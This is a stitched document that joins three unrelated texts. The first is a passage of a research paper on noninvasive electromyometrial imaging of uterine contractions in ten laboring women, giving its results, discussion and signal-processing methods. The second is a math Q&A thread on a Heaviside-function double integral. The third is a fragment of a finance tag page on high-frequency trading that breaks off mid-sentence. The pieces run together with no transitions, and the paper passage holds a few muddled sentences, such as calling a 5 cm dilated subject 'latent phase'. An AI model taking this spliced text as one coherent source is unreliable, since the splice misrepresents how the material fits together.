the next. For example, site B activated earlier than sites C and D in the first contraction, while site B activated after sites C and D in the second one (Fig. 3a). The detailed sequential activation process during the first contraction was demonstrated in Fig. 3c. The upper row shows the sequential uterine isochrone maps at different times. The warm-colored (red and yellow) regions activated early, the cool-colored regions (cyan and blue) activated late, and the gray-colored regions were not activated. The lower row shows the activation ratio (AR), defined as the percentage of uterine regions that were activated at times associated with each uterine map above. AR is calculated as dividing the area of the activated uterine region by the total uterine area as a function of time. At the end of the activation process, the complete isochrone map of uterine activation (Fig. 3d) was generated to visualize the electrical activation pattern during the entire uterine contraction. The isochrone map reveals a complete 3D activation sequence, which does not show clear long-distance propagation. First, EMMI can detect the active or inactive region during a contraction. When a large portion of the uterus remains inactive, there is insufficient myometrium to support long-distance propagation. Second, even when a large portion of the uterus is active, we did not find cardiac-like long-distance propagation within the activated region. Based on the rich spatial and temporal information in the isochrone map, an EMMI activation curve can be generated to reflect the temporal change of the AR over time during the entire uterine contraction period (Fig. 3e). The morphology of the EMMI activation curve reflects multiple key features of uterine contraction. Maximal activation ratio (MAR) can be quantified as the total activated myometrium by the end of the contraction. The activation curve slope (ACS) is defined to reflect the slope of the activation process (black dashed line in Fig. 3e), defined as MAR divided by the time taken to reach MAR during a contraction. Based on the activation curve, the initial 33% of the active myometrium regions can be detected and defined as early activation regions and mapped back onto the 3D uterine surface to form the early activation map (Fig. 3f). In the early activation map, early active regions were shown in red, late active regions were shown in blue, and inactive regions were shown in gray (Fig. 3f). The fundus area (the 25% of the uterine surface area in the anatomical superior uterine segment, see Method) was labeled by the white dashed line (Fig. 3f), and the fundal early activation ratio (FAR) is defined as the percentage of early activation region located within the fundus area. FAR measures the extent of fundal myometrium involved in the early activation during a contraction. ### Imaging uterine contractions during labor in nulliparous patients EMMI was employed to study five nulliparous subjects (Subjects #1–5) in the active phase of term labor (Fig. 4). Subject #1 was imaged by EMMI when her cervical dilation was 3.5~4 cm (Fig. 4a). The prominent activation feature of the isochrone maps is that the activated myometrial regions were small (the gray indicates the inactive myometrium. MAR: 6.25%, 8.13%, and 19.38%) and primarily distributed at the middle and lower segments of the uterus. Based on the isochrone maps, the uterine activation curves were derived (blue curves in Fig. 4a; see details in Fig. 2e). For Subject #1, the uterine contraction activation curves were flat. The subject’s ACS values were low (0.25%/s, 0.22%/s, and 0.34%/s), and FAR values were zeros. The EMMI isochrone maps and indices suggested that the subject’s uterus was not yet electrically mature nor strongly engaged in generating forceful, synchronized contractions during the period of the electrical recording. It took 7.01 h for the subject to reach full cervix dilation after the electrical recording, and the average cervical dilation rates were 0.86 cm per h. Combined with the subject’s clinical data, EMMI findings suggest that uterine contractions involve a small amount of myometrium, as indicated by the low MAR, at the early stage of active labor. For Subject #2 (Fig. 4b), three representative contractions were imaged at 4.07 h before full cervix dilation. The subject’s cervical dilation remained at 4 cm unchanged throughout the electrical recording. Although the entire uterus was not activated during the contractions, as shown in the isochrone maps, the activated uterine regions are much greater than in Subject #1. The MAR has a higher value than those in the first subject, suggesting a higher value of MAR (38.75%, 48.44%, 50.31%). Interestingly, the MAR is increasing across different contractions during the electrical recording period, suggesting that the uterus is actively recruiting more myometrium (e.g., 12.56% more myometrium was recruited into the third contraction than in the first). Within the activated uterine regions, different activation sequences were imaged for the three contractions, and no fixed early activation regions were observed. However, all three contractions were activated from the anterior-inferior fundus and lateral areas of the uterus (red-yellow regions). Activation curve slope (ACS) also increased from 1.19%/s to 1.37%/s, representing a 0.18%/s increase, suggesting the active uterine regions contracted in a more synchronized fashion in the later contractions. Fundal early activation ratios (FAR) were 7.5%, 1.25%, and 36.25%, respectively, suggesting a more fundus-initiated uterine contraction in the third contraction. The cervical dilation of Subject #3 (Fig. 4c) was maintained at 5 cm during the electrical recording, which is 1 cm larger than that in Subject #2 (Fig. 4b). Three representative contractions were imaged at 14.41 h before full cervix dilation. However, the time to full dilation was 14.41 h, and the cervical dilation rate was 0.17 cm per h, indicating that this subject was in the latent phase of labor and had slow clinical labor progress. Similarly, we did not observe identical activation patterns and the existence of consistent initiation sites in Subject #2. Specifically, Subject #3 has high and increasing MAR for the three contractions (51.86%, 58.39%, and 65.22%). Similarly, the ACS also increased dramatically in the last two contractions (1.19%/s, 1.74%/s, and 1.75%/s). It was also noted that the early activation region (red-yellow) was dominantly located in the fundus region for the three contractions (FAR: 33.75%, 46.25%, and 31.25%), suggesting fundus-initiated contractions in this subject during the electrical recording. Despite the strong uterine contractions, the subject’s cervix dilated at a very slow rate of 0.17 cm per h to the full cervical dilation after the electrical recording. EMMI was used to examine two subjects with cervical dilation greater than 5 cm (Subjects #4 and #5). Subject #4 (Fig. 4d) was mapped at 6.5~9.5 cm cervical dilation and 0.23 h before full dilation, dilated at the rate of 2.17 cm per h, which was much faster than that observed in Patient #1–3. The uterus was highly active (MAR: 96.88%, 71.56%, and 83.13%), fairly synchronized (ACS: 2.15%/s, 2.00%/s, and 1.99%/s). and had high FAR (40%, 67.50%, and 56.52%). The MAR values of those contractions are much higher. Similar observations were made for Subject #5 (Fig. 4e). Considering that both Subjects #4 and #5 have strong uterine contractions suggested by high MAR, ACS, and FAR, the significant difference in cervical dilation rates between the two subjects suggested an inter-subjects difference in cervix properties as we observed for subjects earlier in active labor (Fig. 4b, c). ### Imaging uterine contractions during labor in multiparous patients Five multiparous subjects were imaged by EMMI (Fig. 5). Similar to the findings in the nulliparous subjects, no fixed initiation sites or consistent activation patterns during uterine contractions were observed. In contrast to the uterine contractions imaged at the early stage of active labor in nulliparous subjects (Fig. 4a, b), EMMI found larger MAR, ACS, and FAR values in the uterine contractions from multiparous subjects (Fig. 5a, b). Subject #6 was mapped at 4 cm cervical dilation, 6.95 h before full dilation, and progressed at 0.86 cm per h after mapping. The MAR (38.75%, 52.50%, and 73.44%) were high and increasing. The ACS (0.91%/s, 1.20%/s, and 2.11%/s) and FAR (6.25%, 12.50%, and 58.75%) followed the same trend as the MAR, indicating the subject was experiencing uterine contractions with quickly increasing strength during the period of the electrical recording. In Subject #7, the cervical dilation range was 4~4.5 cm, and the time to full dilation was 1.62 h. Her labor progressed at dilation rates of 3.39 cm per h. The MAR (50.93, 40.68%, and 42.86%), ACS (2.37%/s, 1.41%/s, and 1.02%/s), and FAR (36.25%, 3.75%, and 15.00%) were high in this subject. In the early stage of active labor, EMMI found that the uterine contractions in the multiparous subjects seem stronger than those in the nulliparous subjects, which may suggest earlier electrical maturation. At the later stage of active labor in the multiparous subjects (Fig. 5c–e), the MAR, ACS, and FAR values were not significantly increased compared to the nulliparous subjects (Fig. 4c–e). Subject #8 was mapped at 5 cm cervical dilation, 3.47 h before full dilation, and progressed at 1.44 cm per h after mapping. The MAR (20.94%, 25.63%, and 25.31%) was <30%. The ACS (0.43%/s, 0.43%/s, and 0.49%/s) were small and FAR (16.25%, 21.25%, and 8.75%) were normal. In Subjects #9 and #10, labor progressed at dilation rates of 2.47 cm per h and 3.52 cm per h, which are ~2.5 and 3.4 times faster than the average rate of 1 cm per h for 90% of the population. The cervical dilation ranges were 5~6.5 cm and 6.5~8 cm, and the time to full dilation was 1.42 h and 0.57 h, respectively. The MAR (15.63%, 19.38%, and 35.63%; 10.31%, 26.25%, and 31.25%) was <40% in both cases. The ACS (0.40%/s, 0.66%/s, and 1.09%/s, 0.26%/s, 0.54%/s, and 0.46%/s) was small and the FAR (6.25%, 7.50%, and 35%, 10.00%, 21.25%, and 31.25%) were normal. These findings may suggest that uterine contractions with lower MAR at the later stage of active labor are sufficient to remodel the cervix effectively and rapidly in the multiparous subjects. ## Discussion In addition to the TOCO monitor and intrauterine pressure catheter (IUPC), multiple research tools have been developed and evaluated to study and evaluate uterine contractions. Magnetomyography (MMG) detects the subtle uterine magnetic activities with an array of superconducting quantum interference devices (SQUID)17, including 151 sensors arranged in a fixed pattern to collect signals from the anterior abdominal region without much attenuation and distortion from the interfaces in volume conductor18,19. Although MMG data correlate with contractile events perceived by mothers and provide distribution maps of local uterine activity, this method does not provide a three-dimensional view of the entire uterus. It requires a large piece of specialized equipment in a magnetically shielded room to measure the weak MMG signals. Electromyography (EMG, also called electrohysterography, EHG) has been developed as an alternative way to noninvasively monitor the uterine electrical activity underlying contractions via several electrodes placed on the anterior part of the abdomen20,21. These EMG signals measured on the body surface are the spatial integral of action potentials from the underlying uterine smooth muscle (myometrial) cells22. EMG can be used to generate a uterine activity tracing that emulates TOCO and is more reliable than TOCO in patients with obesity23, providing objective measurement of regional electrical activities. Specifically, EMG studies have revealed that the electrical propagation velocity increases at active labor compared to that at non-active labor24,25,26. Although some EMG studies have revealed that the electrical propagation velocity increases at active labor compared to that at non-active labor27, the previous studies also reported controversial findings. Additionally, several features of EMG signals, such as the intensity, peak frequency of power spectrum, etc., show some promise in identifying the onset of labor28,29,30,31,32,33,34,35,36. Although the development of EMG has shed light on electrical activation during contractions, EMG is still limited to measuring a small area on the maternal abdomen and does not have sufficient spatial coverage and specificity to reflect the electrical activation pattern on the entire 3D uterine surface. This may well explain the complex and heterogenous electrical activity propagation patterns measured with limited number and non-standard configuration of the body surface electrodes in subjects during active labor27,37,38,39. In theory, one can overcome the limitations of body surface EMG by placing electrodes directly on the uterine surface. However, those invasive studies are usually challenging to conduct in animals and unethical in humans. To address these limitations and inspired by the success of the sheep EMMI system13,14,15, we developed a human EMMI system and demonstrate its unique advantages, i.e. noninvasively image the electrical activities underlying uterine contractions during labor across the entire 3D uterine surface in high spatial and temporal resolution (Fig. 1). Uterine surface potential maps imaged by EMMI provide a noninvasive measure of uterine contraction patterns without the need for surgery and placement of uterine surface electrodes (Fig. 2). EMMI can also image the uterine surface electrograms to reflect the local uterine electrical activities (Fig. 3). Based on the morphology of the EMMI uterine surface electrogram across the entire uterine surface with high spatial resolution, the inactivated myometrium regions can be well delineated, which cannot be quantified by conventional body surface EMG (Fig. 3). For the activated uterine regions, the derived activation sequence (isochrone map) reflects the uterine contraction pattern (Fig. 3). Based on our EMMI findings in both nulliparous and multiparous subjects, the entire uterus is not active during uterine contractions, especially in the early phase of the labor. This cannot be detected by the conventional TOCO or body surface EMG (Figs. 4 and 5). Distinct from rhythmic cardiac activation, uterine contraction has dramatically different activation patterns from contraction to contraction. This is consistent with previous findings of the absence of a predominant propagation direction40,41. Our results indicate that there are no consistent early activation regions in different uterine contractions, and this is direct evidence against an anatomically fixed, cardiac-like pacemaker region in the human myometrium41. Finally, long-distance propagation of activation is also not evident in human uterine contraction41,42,43. This human EMMI study thus demonstrates that EMMI can noninvasively provide rich information on human uterine activation patterns. EMMI isochrone maps provide detailed activation sequences over the entire activated uterine regions. Based on the information in the 3D isochrone map, the activation curve describes the percentage of activated uterine area at different over the course of a contraction (Fig. 3) and reflects the temporal progression of myometrium activation. Two EMMI indices, maximal activation ratio (MAR) and activation curve slope (ACS), can be defined (Fig. 3) from the uterine activation curve. Particularly, MAR indicates the total surface area of the uterus that becomes electrically active during an individual contraction; and ACS indicates the rate of the uterine electrical activation development. Although we observed the overall monotonic increase of MAR and ACS during the electrical recording period of the active phase of human labor, MAR and ACS may temporally decrease and fluctuate in some cases (Fig. 4e, Fig. 5b). This can be potentially explained by the presence of the refractory regions generated by the complicated and dynamically changing activation sequences during uterine contractions. In addition, based on the anatomy of the uterine fundus and the early activations (the 33% active uterine sites that activate first), we define the third EMMI index, fundal early activation ratio (FAR) (Fig. 3). Although no fixed, cardiac-like pacemakers were observed by EMMI in our study, FAR objectively quantified the percentage of the fundal region that contributed to the early activation and generated contractions to dilate the cervix. In comparison to the overall increasing trend of MAR and ACS during labor, FAR demonstrated more contraction-to-contraction variations. This is consistent with the dynamic nature of uterine activation patterns and can be potentially used as a novel imaging biomarker to reflect the uterine contraction pattern during normal and arrested labor2,44. As described herein, we have developed a human EMMI system and imaged human uterine contractions during active labor in 10 subjects (5 nulliparous and 5 multiparous subjects). With the uterine activation pattern images and newly defined indices, EMMI will allow us to “see” and quantify the uterine contractions in 3D for each individual subject during labor and provide new insights about human labor progression beyond cervical dilation. In the nulliparous subject group, EMMI observed weaker, less synchronized, and less fundus-dominated contractions at the early stage of active labor. The uterine contractions became much stronger and synchronized in the later stage of active labor. It is known that both cervical properties (such as stiffness, etc.) and uterine contractions affect labor progression. Poor labor progression or labor arrest can be caused by insufficient uterine contraction, stiff cervix, or both. The EMMI isochrone maps, early activation maps, activation curves, and indices provide new quantitative characteristics of the uterine contributions to labor progression. This will be critical to clinically confirm or exclude the uterine causes of slow labor progression. For example, the slow labor progression in Subject #3 was not caused by the inactive uterus, but potentially by a stiff and slowly-dilating cervix (Fig. 4c). In the multiparous subject group, stronger uterine contractions were indicated by the larger MAR, ACS, and FAR values were observed in the early stage of the active labor. This suggests the faster electrical maturation of the uterine contraction compared with that of nulliparous subjects. This finding supports the “myometrium memory” effect in multiparous subjects43,45,46. In addition, EMMI found uterine contractions with lower MAR at the later stage of active labor in the multiparous subjects in comparison with the nulliparous groups. However, the weaker contractions seem sufficient to dilate the cervix at a faster rate than that observed in the nulliparous group. This finding suggests that the cervix of multiparous subjects may be generally softer and easier to be dilated than the cervix of nulliparous subjects, consistent with what is clinically observed. The clinical utility of EMMI-derived outputs will require prospective clinical trials involving multiple EMMI assessments throughout labor, for example, the correlation of MAR with cervical dilatation. In this initial study with the 10 uncomplicated singleton pregnancies studied with EMMI in labor at 37w0d – 40w6d gestation and at cervical dilatation between 3.5 and 9.5 cm, we observed that nulliparous subjects demonstrated different phenotypes from the multiparous subjects (Figs. 4 and 5). These initial results may be suggestive of subgroups of uncomplicated nulliparous women in labor. In this first human EMMI study, we derive the intuitive EMMI indices, such as MAR, ACS, and FAR, which relate to organ-level electrical activity patterns and propagation. We found that the EMMI-derived human uterine activation curves have a sigmoidal evolution nature with respect to time, which potentially reflects the bioelectrical stimulation-response dynamics during uterine contractions47. An earlier in vitro study using the rabbit uterine muscle studied the relationship between maximum contraction tension and duration/strength of electrical stimulation48. They found Hill’s force-velocity relationship between the kinetics of isotonic contractions as a function of load (tension). EMMI-derived human uterine activation curves clearly confirm a potential regenerative process in human uterine contractility using a positive feedback mechanism. These findings will enable future studies to derive a comprehensive and uterus-relevant physiological assessment of human uterine contractions using EMMI. Although we focus on the technological development and scientific benefits of the EMMI system in this work, EMMI holds great potential for wide clinical application. Pitocin, a synthetic version of naturally derived oxytocin, is the most commonly used medication to augment labor progress. However, oxytocin is released in a pulsatile fashion, while Pitocin is given in an escalating, continuous drip, titrated to contraction frequency and intensity. But nothing is known regarding the direct effect of Pitocin on myometrial electrical activation and propagation, and whether or not this non-physiologic delivery is optimal has never been explored. EMMI will enable these explorations and uncover further insights regarding the physiology of labor and labor management. There are several limitations to the current human EMMI system and analyses that can be addressed and improved in future work. Currently, a large number of BioSemi Active electrodes (BioSemi B.V, Amsterdam, The Netherlands) are placed around the subject’s body surface. In order to speed up electrode application, increase the comfort of wearing those electrodes, and decrease the cost, we are currently developing low-cost, elastic, disposable electrode patches using printing technology49,50,51. Optimization of electrode number and distribution will also increase subject compliance with the EMMI system. Another factor limiting the scalability and accessibility of the current human EMMI system is the availability and cost of MRI. A portable and low-cost ultrasound imaging system that is widely available in obstetric clinics can be integrated with the EMMI system to acquire the subject-specific body-uterus geometry. The current EMMI study only imaged uterine contractions for 1-hour from a small number of subjects. Longer electrical recordings covering the entire labor process from a larger normal-term labor subject cohort will enable us to build the “normal term atlas” describing the detailed electrophysiology and normal standards of uterine contractions at high temporal and spatial resolution. This atlas will facilitate translational studies to define the mechanisms underlying normal human labor and identify EMMI uterine contraction indices and the spatial-temporal signatures of uterine contractions that may be altered in subjects with labor arrest and preterm contractions. In the longer term, this atlas could be used in clinical trials aimed at testing interventions to prevent labor complications such as labor arrest, preterm birth, and postpartum hemorrhage. ## Methods ### Study implementation This study was approved by the Washington University Institutional Review Board (No. 201612140). Nulliparous and multiparous subjects were recruited, and those willing to participate underwent informed consent. The subjects were compensated 50 USD for MRI and 50 USD for labor mapping in the form of prepaid gift cards. In this manuscript, deidentified data from 10 term subjects are presented, among which 5 are nulliparous and 5 multiparous. The ages of the subjects were in the range of 18–37 years old. The cervical dilation of the subjects during the EMMI mapping was in the range of 3.5 to 9.5 cm. The subjects underwent MRI at ~37 weeks’ gestation and then underwent electrical mapping for 1 h during the first stage of labor. Detailed subject information is in Table 1. ### EMMI system Before MRI scanning, two adhesive measuring tapes were placed on the body surface to guide the placement of MRI markers (Fig. 1). For the abdominal surface, a measuring tape of 30 cm was placed vertically through the midline using the umbilicus as a biomarker and another tape of 61.3 cm was placed horizontally about 4 cm below the fundus over the vertical tape. The fundus was located by an obstetric clinician. Similarly, the back surface, a measuring tape of 30 cm was placed vertically along the spine and ending at the coccyx; another tape of 61.3 cm was placed horizontally at the upper edge of the ilium over the vertical tape. Up to 24 adhesive vinyl-silicon patches containing up to 192 MRI-compatible markers were placed referencing the measuring tapes on the subject’s body surface to mimic the electrodes for electrical recordings during active labor. MR images were acquired with the subject in either the supine or left lateral position. MRI was performed in a 3 T Siemens Prisma or Vida whole-abdomen MRI Scanner with a radial volume interpolated breath-hold examination fast T1-weighted sequence. MR image resolution was 1.56 mm × 1.56 mm, and the slice thickness was 4 mm. BioSemi pin-type unipolar electrodes were assembled into 2 × 4 patches with 3 cm inter-sensor distance. When the subject was in active labor, up to 24 electrode patches containing up to 192 electrodes were placed in the same layout as the MRI markers (Fig. 1). Four ground electrodes were placed at the left and right upper chest, and the left and right lower abdomen, respectively. The body surfaces with electrodes were collected with an optical 3D scanner (Artec 3D, Eva) with structured white light (white 12 LED array and flashbulb) (Fig. 1). The 3D accuracy of the optical scanner is 0.1 mm, and the resolution is 0.5 mm. The subjects’ back surfaces were scanned while they were sitting, and their body surfaces were scanned while they were in Fowler’s position. After the 3D scanning, the multichannel electrodes were connected to an analog-to-digital converter, and the bioelectricity signals were simultaneously recorded using ActiView Software 8.09 with a 2048 Hz sampling rate. ### EMMI data processing The MR images, optical 3D scanned surface images, and body surface EMGs were processed using Matlab 2019b (Fig. 1). The geometry, electromyography, uterine electrical activation isochrone map, and early activation map data generated in this study are provided in the Source Data file.The data processing has four parts: (1) Signal preprocessing removes noise and baseline drift in the EMG recordings, eliminates poor contact signals, and excludes motion artifacts; (2) Body-uterus geometry construction delineates the coordinates of body and uterine surface sites and models the triangular meshes to represent these surfaces; (3) Inverse computation uses the Method of fundamental solutions to combine the body-uterus geometry and body surface potentials and compute the uterine surface potentials; (4) Data visualization and analysis is used to post-process the uterine surface potentials. Detailed descriptions of the four components are provided in the following subsections. The raw electrical recording data were first filtered by a low-pass filter with a cutoff of 40 Hz and then were down-sampled with a mean filter by 20 (sampling rate from 2048 Hz to 102.4 Hz) to reduce the data size and computation time of EMMI. After that, the signals were filtered by a fourth-order Butterworth high-pass filter with a cutoff frequency of 0.34 Hz. The 0.34 Hz high-pass filter aims to reduce the respiration artifacts2, which otherwise will affect the accuracy of identifying the onset of the EMG burst. Next, an eighth-order Butterworth low-pass filter with a cutoff frequency of 1 Hz was applied. Finally, a multi-step artifacts detection algorithm was applied to the band-passed signal to detect invalid EMGs containing abnormally large EMG data and distorted body surface potential maps (BSPM). The first quartile of the mean absolute magnitudes of each processed EMG was a reference; any EMG with an absolute magnitude larger than 100 times the reference is detected as an invalid EMG. The median values of the mean absolute magnitude of all ASPMs were a reference, and any ASPMs with mean absolute magnitudes larger than ten times the reference are detected as distorted ASPMs. The local peaks are defined as the peak-peak magnitude within a moving window of 2 seconds. The local artifacts are identified as local peaks with a magnitude larger than ten times the median of the local peaks. An EMG with >50% of the signal contaminated by the local artifacts was defined as an invalid EMG. A BSPM with >50% of the sites contaminated by local artifacts was identified as a distorted BSPM. The invalid EMGs and distorted BSPMs were not included in the following analysis. The sagittal slices of MR images and optical 3D scans are used to generate the body-uterus geometry. There are three main steps: First, obtain the triangulated mesh surfaces from MR images and the optical 3D scans separately using Amira Software 6.4 and Artec Studio 12. Second, align the optical 3D body surface to the MRI-derived surface and register the optical 3D electrode locations onto the MRI-derived surface (see Supplementary Fig. 1 for details). Third, obtain the coordinates of electrodes and the points on the uterine mesh surface to construct the body-uterine geometry. The inverse computation combines the body surface electrical potential maps and subject-specific body-uterus geometry to reconstruct uterine potentials. The volume between the uterine surface and body surface $$\Omega$$ is assumed to be homogeneous, containing no primary electrical source and no eligible inductive effect13,16,52. Therefore, the mathematical formulation underlying this inverse problem can be described by the Cauchy problem for Laplace’s Eq. (1) with two boundary conditions on the body surface, $${\nabla }^{2}\phi \left(x\right)=0,\,x\in \Omega,$$ (1) $${{{\rm{Dirichlet\; condition}}}}\phi \left(x\right)={\phi }_{{{{\rm{B}}}}\left(x\right)},\,x\in {\Gamma }_{{{{\rm{B}}}}},$$ (2) $${{{\rm{Neumann\; condition}}}}\sigma \frac{\partial \phi \left(x\right)}{\partial {{{\bf{n}}}}}=0,\,x\in {\Gamma }_{{{{\rm{B}}}}}.$$ (3) $${\Gamma }_{{{{{{\rm{B}}}}}}}$$represents the body surface. $${\phi }_{{{{{{\rm{B}}}}}}\left(x\right)}$$ is the measured body surface potential at location $$x$$. $$\sigma$$ is the conductivity of the volume conductor $$\Omega$$, which is assumed to be homogeneous. $${{{{{\bf{n}}}}}}$$is the normal vector on the body surface at $$x$$. Because the conductivity of air is 0, the right side of Eq. (3) is simplified to 0. The Method of fundamental solutions16, a mesh-free method robust to noise, was employed to discretize Eqs. (13) and construct the relationship between the measured body surface potentials ($${\phi }_{{{{{{\rm{B}}}}}}}$$) and uterine surface potentials ($${\phi }_{{{{{{\rm{U}}}}}}}$$), $${\Phi }_{{{{{{\rm{B}}}}}}}={{{{{\bf{A}}}}}}{\Phi }_{{{{{{\rm{U}}}}}}}.$$ (4) $${\Phi }_{{{{{{\rm{B}}}}}}}$$ is a matrix of M by T, $${\Phi }_{{{{{{\rm{U}}}}}}}$$is a matrix of N by T, and $${{{{{\bf{A}}}}}}$$ is a matrix of M by N, where M is the number of electrodes on the body surface, N the number of discrete points on the uterine surface, and T the number of potentials maps. The Tikhonov regularization53 was employed to stabilize the ill-posed inverse computation, which gave a unique solution for each measured abdominal surface potential ($${\Phi }_{{{{{{\rm{U}}}}}}}$$), and no human intervention was required. A fixed regularization value of 0.01 was used in the Tikhonov-based inverse computation. After the inverse computation, three types of uterine signals were generated. First, a uterine surface potential map is the electrical potential distribution on the 3D uterine surface at each time point. The time resolution for the uterine potential maps is 102.4 Hz. Second, a uterine electrogram denotes a time series of the electrical potential data at a specific uterine site. Typically, electrograms were calculated at around 320 sites on the uterine mesh. Third, the isochrone map represents the sequence of uterine electrical activation derived from the local activation times during an observation window. The observation window of a UEB started from a time point when the uterus was generally quiet to a time point when the uterus was electrically activated and returned to quiescence. The activation time for a UEB at each uterine site was defined separately according to the magnitudes of the UEB. The uterine electrogram was first processed with the Teager-Kaiser Energy Operator (TKEO)54, which improves the signal condition at the onset and offset of the UEB (Supplementary Figs. 2a, b). Then, a root-mean-square (RMS) envelope with a moving window of 7 seconds was derived from the rectified TKEO signal (the black line in Supplementary Fig. 2c), to distinguish signals of activation or baseline. The threshold of the baseline was defined as 1.01 times the median values of the RMS envelope (the blue line in Supplementary Fig. 2c). The threshold for electrical activation was defined as the mean plus twice the standard deviation of the baseline signals. Finally, a UEB was defined as the RMS envelope over the threshold. Considering the low-frequency nature of the uterine, we down-sampled the RMS envelope signals by 20 times when we calculated the activation times. The time resolution for analysis of uterine electrical activation was 5.12 Hz. After the UEB detection, the signal-to-noise ratio (SNR) of the electrogram at each uterine site was defined as the ratio between the power of the UEBs and that of the baseline signals in the Decibel (dB) unit. The uterine electrograms with SNR higher than 5 dB are regarded as qualified contraction signals, and the relevant UEBs are defined as qualified UEBs. The qualified UEBs that last between 5 seconds and 80 seconds are detected as valid electrical activation for labor contractions. The initiation times of electrical activation were generated from individual uterine surface electrograms at uterine sites, without considering the spatial connectivity. They thus may not preserve spatial continuity in uterine electrical activation pattern. So, with the raw activation time defined on the 3D uterine sites, a series of erosion-dilation operations (similar to morphological filtering) were performed using a customized algorithm written in Matlab to smoothen the isochrone maps: First, tiny activated regions that are wrongly picked up were redefined as inactive by performing an erosion; second, a dilation to the active regions, where erosion sets the activated sites that has one or more inactive neighbors as inactive, and dilation does the opposite. And similarly, we fill tiny inactive regions by performing dilation and then erosion to the active regions, where the new active sites generated by dilation are assigned with activation times by averaging their active neighbors. Because the activation times are relative in isochrone maps, we add or subtract the same number to all activation times so that the first activation starts at 1 second, to avoid potential singularity in calculations. An isochrone map is derived from the updated activation times defined on the 3D mesh of the uterine surface. The activation curve tracks the percentage of uterine sites that have ever been activated during that contraction. As time increases from zero, the curve starts from the origin, increases by the number of new active uterine sites at the times of new activations, and does not change at the times there are no new activations. The maximal activation ratio (MAR) is the final percentage of the uterine sites that have even been activated. The activation curve slope (ACS) is the slope of the activation process, defined as MAR divided by the time taken to reach MAR, with the unit being percent per second. Fundal early activation ratio (FAR) is the percentage of the number of active fundal sites that activate the earliest 33% across the uterus by the number of fundal sites. The fundus is defined as the uterine region that consists of the nearest neighbors (with Euclidean distance as the metric) of the anatomical top of the uterus and has one-fourth number of sites of the uterine sites. ### Reporting summary Further information on research design is available in the Nature Portfolio Reporting Summary linked to this article.
# Heaviside multivariable integral on a finite domain I have an integral of the form $$I=\int_0^{\ell_p}dp_1\int_0^{\ell_p}dp_2\theta\left(-\lambda+\cos\left(\frac{2\pi p_1}{\ell_p}\right)+\cos\left(\frac{2\pi p_2}{B\ell_p}\right)\right),$$ Where $$B,\ell_p$$ are real constants and $$\lambda\in(-2,2)$$. My EFFORT: I know that $$\int_{\mathbb{R}^2}\theta(u(x,y))dxdy=\int_{\Omega}1dxdy$$ where $$\Omega=\{(x,y) :u(x,y)>0\}$$ Am I right in assuming that for my case we have $$I=\int_{\tilde{\Omega}}1dp_1dp_2,$$ where $$\tilde{\Omega}=\{(p_1,p_2):0 and $$u(p_1,p_2)=-\lambda+\cos\left(\frac{2\pi p_1}{\ell_p}\right)+\cos\left(\frac{2\pi p_2}{B\ell_p}\right)$$? Now from this: The condition $$0 gives $$p_2>\pm\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)+2\pi k,$$ where $$k\in\mathbb{Z}$$. The condition $$u(p_1,p_2) gives $$p_2<\pm\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)+2\pi m$$ where $$m\in\mathbb{Z}$$. Taking $$m,k=0$$ and taking the positive branch we have $$I=\int_0^{\ell_p}\int_{\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)}^{\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)}dp_2dp_1\\ =\int_0^{\ell_p}\frac{\ell_pB}{2\pi}\arccos\left(1+\cos\left(\frac{2\pi}{B}\right)-2\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)-\frac{\ell_pB}{2\pi}\arccos\left(\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)\right)dp_1.$$ And so far I can't seem to solve this integral, explicitly at least... I have tried letting $$\cos(z)=\lambda-\cos\left(\frac{2\pi p_1}{\ell_p}\right)$$ but this produces $$\pm$$ signs when looking the derivatives and when looking at the limits and I'm not sure on which branches to take etc., some help with this would be greatly appreciated also. • $\theta$ is your name for the Heaviside function, $\theta(x)=0$ if $x<0$ and $=1$ if $x>0$, right? Are your $p_i$ integers? If so, you might as well take $p_1=p_2=1$, as the distribution of values of $\cos(kt)$ over a full period $0\le t<\pi$ does not depend on $k$ – kimchi lover May 24 at 12:54 • Yes $\theta(x)$ is the Heaviside function, the $p_i$s are not integers they are integration variables and so are continuous in the interval $[0,\ell_p)$. – Lewis Proctor May 24 at 14:05 • Careless reading on my part. Sorry. – kimchi lover May 24 at 14:28 • no problem, I can't seem to find anything about the Heaviside step function restricted to a finite domain, I thing once I understand this I will be able to progress with my problem quickly. – Lewis Proctor May 24 at 14:33
# Tag Info 19 You could for example look at this research paper released by Deutsche Bank's Research group just yesterday which defines both high-frequency and ultra-high-frequency trading. In the paper it says Typically, a high frequency trader would not hold a position open for more than a few seconds. Empirical evidence reveals that the average U.S. stock is ... 16 The lead paper in the January 2011 Journal of Finance (Hendershott, Jones, and Menkveld) addresses algorithmic trading (AT). In short, they find that AT improves liquidity as measured by bid-offer spreads. Taking the econometrics as correct (it is in the Journal of Finance) the next question is if bid-offer spreads are a sufficient statistic for measuring ... 14 I would say in the context of trading in general (for HFT see my comment above) further developments of recurrent neural networks (RNN), e.g. so called historical consistent neural networks (HCNN) together with forecasting ensembles, are state of the art. I published an article on that which will be published this month by Springer Verlag (Zimmermann, ... 14 A survey by FinAlternatives in 2009 concluded that "86% believe that the term “high-frequency trading” referred strictly to holding periods of only one day or less." (Aldridge 2009): There are two problems with this survey for our present discussion: (1) the meaning of the term has been clarified significantly since that survey and (2) it surveyed a wide ... 14 My definition is not pretty, but it's practical: If you trade based on 5- or 10-minute bars, I call that high-frequency trading. If you trade based on tick-by-tick data, including bids and offers, I call that ultra-high frequency trading. (Trading 1-minute bars is somewhere in between. Trading more slowly than 10-minute bars is "day trading".) I make this ... 14 I'll take a stab at it, but this is a really broad question. A direct answer: Bayesian models often use "probability that the counter-party is informed." Indirect answers: I think your assumption is that the algorithm operates on each stock individually, and has no knowledge of what it's doing in any other stock. But, it is likely that the algorithm is ... 14 There are few things to consider. Trading moves the price, to minimize market impact and maximize return it is generally optimal to split an order in several child orders. See the Kyle model. Splitting optimally dependents on specific assumptions that you make. The simplest (and first) approach is that of Berstsimas and Lo (Optimal Control of Execution ... 11 All HFTs are event driven. In the 